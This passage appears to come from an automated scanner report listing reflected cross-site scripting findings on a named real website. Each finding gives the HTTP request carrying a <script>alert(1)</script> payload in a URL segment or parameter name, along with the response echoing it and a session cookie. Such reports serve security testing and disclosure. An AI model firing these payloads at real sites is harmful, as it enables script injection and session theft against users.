GET /detail/10444fb<script>alert(1)</script>1e7ba32b487/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10444fb<script>alert(1)</script>1e7ba32b487/themes/ was not found on this server.</p>
...[SNIP]...

2.843. http://www.resellerbase.com/detail/10/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5c016<script>alert(1)</script>792fdeb6a51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes5c016<script>alert(1)</script>792fdeb6a51/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes5c016<script>alert(1)</script>792fdeb6a51/ was not found on this server.</p>
...[SNIP]...

2.844. http://www.resellerbase.com/detail/10/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 579e8<script>alert(1)</script>bfb200cb3ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/?579e8<script>alert(1)</script>bfb200cb3ce=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/?579e8<script>alert(1)</script>bfb200cb3ce=1 was not found on this server.</p>
...[SNIP]...

2.845. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 589b1<script>alert(1)</script>25bd190d50c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail589b1<script>alert(1)</script>25bd190d50c/10/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail589b1<script>alert(1)</script>25bd190d50c/10/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.846. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31aa7<script>alert(1)</script>00193d40249 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1031aa7<script>alert(1)</script>00193d40249/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1031aa7<script>alert(1)</script>00193d40249/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.847. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 641f8<script>alert(1)</script>b42a1a62195 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes641f8<script>alert(1)</script>b42a1a62195/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes641f8<script>alert(1)</script>b42a1a62195/kosmos/ was not found on this server.</p>
...[SNIP]...

2.848. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload af621<script>alert(1)</script>d160fb4faa8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmosaf621<script>alert(1)</script>d160fb4faa8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.849. http://www.resellerbase.com/detail/10/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc6b5<script>alert(1)</script>37472bfcfad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/?fc6b5<script>alert(1)</script>37472bfcfad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.850. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ae67<script>alert(1)</script>3f8cbbc8dd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4ae67<script>alert(1)</script>3f8cbbc8dd4/10/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4ae67<script>alert(1)</script>3f8cbbc8dd4/10/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.851. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9fcc<script>alert(1)</script>2f2dde044d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10e9fcc<script>alert(1)</script>2f2dde044d7/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10e9fcc<script>alert(1)</script>2f2dde044d7/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.852. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 149c5<script>alert(1)</script>5fc4f32a215 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes149c5<script>alert(1)</script>5fc4f32a215/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes149c5<script>alert(1)</script>5fc4f32a215/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.853. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0efe<script>alert(1)</script>fd472053f89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmosc0efe<script>alert(1)</script>fd472053f89/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmosc0efe<script>alert(1)</script>fd472053f89/images/ was not found on this server.</p>
...[SNIP]...

2.854. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4e71<script>alert(1)</script>4e319c7c4d0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/imagesc4e71<script>alert(1)</script>4e319c7c4d0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/imagesc4e71<script>alert(1)</script>4e319c7c4d0/ was not found on this server.</p>
...[SNIP]...

2.855. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c179f<script>alert(1)</script>c6fdae497e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/?c179f<script>alert(1)</script>c6fdae497e0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/?c179f<script>alert(1)</script>c6fdae497e0=1 was not found on this server.</p>
...[SNIP]...

2.856. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0ee4<script>alert(1)</script>73ab919bacc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb0ee4<script>alert(1)</script>73ab919bacc/10/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb0ee4<script>alert(1)</script>73ab919bacc/10/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.857. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb055<script>alert(1)</script>ce7996a6c2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10fb055<script>alert(1)</script>ce7996a6c2a/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10fb055<script>alert(1)</script>ce7996a6c2a/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.858. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2fa23<script>alert(1)</script>250f6086de5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes2fa23<script>alert(1)</script>250f6086de5/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes2fa23<script>alert(1)</script>250f6086de5/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.859. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87394<script>alert(1)</script>fb272d71d54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos87394<script>alert(1)</script>fb272d71d54/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos87394<script>alert(1)</script>fb272d71d54/images/rating/ was not found on this server.</p>
...[SNIP]...

2.860. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 92f84<script>alert(1)</script>df7cfab2eb2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images92f84<script>alert(1)</script>df7cfab2eb2/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images92f84<script>alert(1)</script>df7cfab2eb2/rating/ was not found on this server.</p>
...[SNIP]...

2.861. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5aff5<script>alert(1)</script>e544781f145 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating5aff5<script>alert(1)</script>e544781f145/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating5aff5<script>alert(1)</script>e544781f145/ was not found on this server.</p>
...[SNIP]...

2.862. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 145b7<script>alert(1)</script>6b39b368ca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/?145b7<script>alert(1)</script>6b39b368ca4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/?145b7<script>alert(1)</script>6b39b368ca4=1 was not found on this server.</p>
...[SNIP]...

2.863. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 1] previous next

